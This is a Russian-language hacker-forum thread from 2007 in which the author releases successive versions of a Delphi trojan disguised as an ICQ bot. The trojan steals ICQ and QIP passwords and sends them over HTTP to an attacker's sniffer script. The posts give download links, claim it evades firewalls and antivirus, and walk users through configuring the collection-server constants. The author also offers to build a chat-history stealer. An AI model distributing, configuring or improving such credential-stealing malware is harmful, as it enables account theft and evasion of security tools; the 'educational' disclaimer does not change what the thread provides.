Релиз ICQ трояна. ver 2

Discussion in 'Skype, IRC, ICQ, Jabber и другие IM' started by А®ТеS, 16 Feb 2007.

  1. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Итак, приступим. Если кто то постоянно тoрчит на Античате и у него хорошая память, то он помнит что гдето месяца полтора назад я выкладывал троянца, который маскируется под ICQ Бота, а на самом деле ворует пароли (очень нехороший =( ). Примерно в воскресенье я сел с утра и начал писать вторую версию. Закончил я это дело в понедельник =). Эти дни я давал троянца на проверку разным хорошим пиплам, чтобы они нашли и сообщили мне о глюках =), теперь же я выкладываю официальную (гыгы) вторую версию троянца. Нового оччень много, но обо всем попорядку. Что добавлено/исправлено:
    - Добавлен поиск по винту НЕУСТАНОВЛЕННОГО QIP.
    - Исправлены глючки с процедурой извлечения паролей (они были и во множетсве = ) ).
    - Кардинально изменен способ передачи данных. Теперь троян использует не ICQ протокол, а HTTP, а еще конкретнее библиотеку WinInet. Не палится файерами (вроде бы =) ). Антивирями тоже не палится.
    - Соответственно, если передача теперь по HTTP, То для троя был написан сниффер (его исходник в проекте).
    - Написан подробный ReadMe.txt =))))

    Обращаю внимание, что программа написана в ОБРАЗОВАТЕЛЬНЫХ целях, не стоит реально украдывать ею аськи!!!!

    Архив с проектом качаем тутс:
    http://ggg123321.narod.ru/troy.rar

    Теперб к вопросам компиляции, после релиза первого трояна ICQ и еще одного моего троянца, мою личку зафлудили вопросами о компиляции =))). Объясняю все и всем сразу =). Ничего сложного нет!!! С проектом идет компонент TICQ2003Decrypt (автор не я, автор CobanS), его нужно установить. Далее нужно нажать ctrl-f9, чтобы Делфи скомпилировал троянца без запуска! Дальше можно оптимизировать размер каким нето пакером, но и то это будет приятное, но не обязательное дополнение. ВСЕ!!!!! Это не сложно!!!!! Если же совсем туго, то можно спросить в теме. Это не стыдно, форум для того и создан чтобы делится опытом и знаниями! Потом, у меня перебои с инетом, и я могу ответить не сразу, а в теме же это сделают пусть и дургие люди но оперативно!

    Авторские права принадлежат прежде всего Antichat.Ru, ну и вашему покорному слуге - А®ТеS'y.
    Вы можете модифироваь код, это только приветствуется, единственное чего вы не имеет права делать, это КОММЕРЧСКИ распространять программу.

    __________________
    CopyRight Antichat.Ru
    2007 year
     
    17 people like this.
  2. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    аффтор пость все в одном посте!
     
  3. Folc

    Folc Elder - Старейшина

    Joined:
    12 Feb 2007
    Messages:
    245
    Likes Received:
    72
    Reputations:
    14
    Кто нить качал?
     
  4. ARMENIN

    ARMENIN Elder - Старейшина

    Joined:
    19 Nov 2006
    Messages:
    48
    Likes Received:
    18
    Reputations:
    0
    я качал вируса не обнаружено, ещё бы суметь под себя подстроить=)

    P.s. СКАЖЕМ ВСЕ СПАСИБО А®Теs!!

    пока на работоспособность не пробовал , но всётаки
     
    1 person likes this.
  5. MilD

    MilD Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    30
    Likes Received:
    2
    Reputations:
    0
    Автору респект!!!
    Выдирает даже с флешек! :eek: .
    Работает вроде без багов, только дельфи 7 при компиляции какой-то совет дает, а так вроде без подстав канектится на указаный сниффер.
    Outpost 4 резет.
    Каспер с доктором вебом с последними базами на момент теста неполили.
    А что там настраивать там по-моему любой догонит. :eek:
    Там на русским в исходниках написано где и что менять =)))
    Если не поймёшь стуки в Асю помогу чем смогу ;)

    P.s. даже я с первого раза все правильно скампилил ;)
     
  6. CBuH

    CBuH Banned

    Joined:
    25 Jan 2007
    Messages:
    41
    Likes Received:
    7
    Reputations:
    0
    Автору респект и плюсик в репу =)
     
  7. bt2mf88a

    bt2mf88a New Member

    Joined:
    15 Feb 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Привет.
    Скачал троя, подключил ICQ2003Decrypt , поменял константы, скомпилил.
    Проверил - не пашет.
    возможно пролема в константах.
    Я их задал в формате:

    Server_Addr: PChar= 'http://Myserver.122mb.com'; // мой сайт
    ScriptName: PChar= 'need.php'; // имя скрипта.
    hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded'; // Не менял

    Скрипт лежит в корневой папке, т.е. http://Myserver.122mb.com/need.php
    Лог файл тоже там.

    С уважением, bt2mf88a
     
  8. MilD

    MilD Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    30
    Likes Received:
    2
    Reputations:
    0
    Задавай в таком виде ;)

    Code:
    Server_Addr: PChar= [COLOR=Red]'Myserver.122mb.com';[/COLOR]
     
  9. bt2mf88a

    bt2mf88a New Member

    Joined:
    15 Feb 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Так тоже задавал...
     
  10. MilD

    MilD Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    30
    Likes Received:
    2
    Reputations:
    0
    У меня примерно так и всё работает.

    Code:
      [COLOR=Yellow]Server_Addr: PChar= 'Myserver.122mb.com';
      ScriptName: PChar= 'need.php';
      hdrs: Pchar= 'Content-Type: application/x-www-form-urlencoded';[/COLOR]
    Посматри может фаер блочит или антивирь?

    Или ты просто неправильно установил компонент TICQ2003Decrypt.

    поставь без заглавной буквы .
    Code:
     Server_Addr: PChar= '[COLOR=Red]m[/COLOR]yserver.122mb.com';
     
  11. bt2mf88a

    bt2mf88a New Member

    Joined:
    15 Feb 2007
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Всем спасибо, все пашет, ошибка была в подключении Unit.pas
    Автору respect ;-) tnx

    P.s. Кстати в лог на серваке все норм пишет, а вот на почту глючный пас присылает...
     
    #11 bt2mf88a, 18 Feb 2007
    Last edited: 18 Feb 2007
  12. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    respect :)
     
  13. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    Могет кто батник написать что б дельфи компилятор неискать?
     
  14. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Что именно глючно? И ты где сниффер разместил? у меня на h17.ru вроде бы все ок=)
     
    1 person likes this.
  15. MilD

    MilD Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    30
    Likes Received:
    2
    Reputations:
    0
    У меня на все хосты и бесплатные и платные все пашет и на мыло все четко приходит!!!
    З.ы. мыло Gmail - e.
     
  16. MilD

    MilD Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    30
    Likes Received:
    2
    Reputations:
    0
    Стукни в асю помагу разобраться!

    З.ы. ася 4287801
     
  17. ARMENIN

    ARMENIN Elder - Старейшина

    Joined:
    19 Nov 2006
    Messages:
    48
    Likes Received:
    18
    Reputations:
    0
    Слух добвь функцию для Mail.ru Agent а тоже плз, буду очень признателен, никто не знает прогу которая крадётисторию переписка ICQ и агента?
     
  18. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Короче я представляю на ваш суд обновленного троянца, версия 2.01 =). Что добавлено/убрано/изменено:
    - Незначительно переработан сорец троянца
    Очень сильно доработан сниффер, теперь там есть:
    - Запись в лог IP адреса с которого все пришло
    - Запись в лог Даты/времени прибытия
    - Теперь есть админка, т.е. без знания логина/пароля лог не посмотришь =). (пароль и логин хранятся ко всему прочему в стойком md5, блин отвлекся =) )
    - Внешний вид админки сниффера довольно таки цивильный, т.е. доработка дизайна =)
    Качаем тута:
    http://ggg123321.narod.ru/varlok_troy_2.01.rar
    Опять же напоминаю, что копирайты принадлежат Античату (AntiChat.Ru) и мне (А®ТеS'у), ты не могешь распространять программ коммерчески, доработка кода лишь приветствуется.

    За незаконное в рамках законодательства твоей страны применение троянца никто, кроме тебя самого ответственности НЕ НЕСЕТ!!! Если будешь пытацца протроянить админов ICQ.com, то можешь сесть по 273 - "Написание и распространение", в остальных случаях тебе грозит лишь посыл на три веселых буквы =)))).
     
    1 person likes this.
  19. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Про мыло агента я думал, может сделаю, переписку украсть невозможно, т.к. она сохраняется на машине пользователя (я так подозреваю что и на icq.com, но это токо мои подозрения =) ). Я даже кстати темку тут на форуме видел, там как раз этот вопрос обсуждали =)
    з.ы. ептыть до меня токо счас доперло что ты имел ввиду =))), короче мона сделать тырильщик логов общения, это легко =)
     
    #19 А®ТеS, 19 Feb 2007
    Last edited: 19 Feb 2007
    1 person likes this.
  20. TALIB

    TALIB Member

    Joined:
    16 Dec 2006
    Messages:
    23
    Likes Received:
    14
    Reputations:
    0
    А®Теs молодец, держи + ;)